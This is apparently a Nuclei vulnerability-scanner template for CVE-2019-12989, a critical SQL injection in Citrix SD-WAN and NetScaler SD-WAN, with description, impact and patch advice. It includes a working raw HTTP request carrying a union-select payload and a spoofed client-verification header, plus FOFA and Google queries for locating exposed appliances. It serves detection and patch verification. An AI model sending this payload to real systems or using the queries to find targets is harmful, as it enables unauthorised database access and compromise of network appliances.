Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 contain an SQL injection vulnerability. An unauthenticated attacker can exploit improper validation of input in specific components, which could allow for execution of arbitrary SQL queries against the backend database. This could result in information disclosure, manipulation of data, or complete compromise of affected systems.
PoC代码[已公开]
id: CVE-2019-12989
info:
name: Citrix SD-WAN and NetScaler SD-WAN - SQL Injection
author: ritikchaddha
severity: critical
description: |
Citrix SD-WAN 10.2.x before 10.2.3 and NetScaler SD-WAN 10.0.x before 10.0.8 contain an SQL injection vulnerability. An unauthenticated attacker can exploit improper validation of input in specific components, which could allow for execution of arbitrary SQL queries against the backend database. This could result in information disclosure, manipulation of data, or complete compromise of affected systems.
impact: |
Successful exploitation may allow a remote unauthenticated attacker to execute SQL commands on the system, potentially resulting in unauthorized access, data leakage, modification of critical data, or full compromise of the SD-WAN appliance.
remediation: |
Apply the vendor patch: upgrade Citrix SD-WAN to version 10.2.3 or later, and NetScaler SD-WAN to version 10.0.8 or later as detailed in the official Citrix advisory.
reference:
- http://packetstormsecurity.com/files/153638/Citrix-SD-WAN-Appliance-10.2.2-Authentication-Bypass-Remote-Command-Execution.html
- https://support.citrix.com/article/CTX251987
- https://www.tenable.com/security/research/tra-2019-32
- https://nvd.nist.gov/vuln/detail/CVE-2019-12989
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-12989
epss-score: 0.91054
epss-percentile: 0.99619
cwe-id: CWE-89
cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:*
metadata:
verified: false
max-request: 1
vendor: citrix
product: netscaler_sd-wan
fofa-query: (title="citrix sd-wan") && icon_hash="177980953"
google-query: intitle:"citrix sd-wan"
tags: cve,cve2019,citrix,sqli,kev,vkev
variables:
num: "999999999"
http:
- raw:
- |
POST /sdwan/nitro/v1/config/get_package_file?action=file_download HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
SSL_CLIENT_VERIFY: SUCCESS
{"get_package_file": {"site_name": "test' union select md5({{num}}), 'x', 'y', 'z' #","appliance_type": "primary","package_type": "active"}}
matchers:
- type: dsl
dsl:
- 'contains_all(body, "status\":\"fail", "Invalid value specified") && status_code == 400'
- 'contains(body, "{{md5({{num}})}}") && status_code == 400'
condition: or
# digest: 4a0a0047304502205a3597fee4808fc1e3718cacdb064e172654ff6f2ad76fb629b3aceaa9421c09022100f5a008a9577fe3a0cdc264fa7ada9c0b2222913f82dad131db95b76aa6fc4e5a:922c64590222798bb761d5b6d8e72950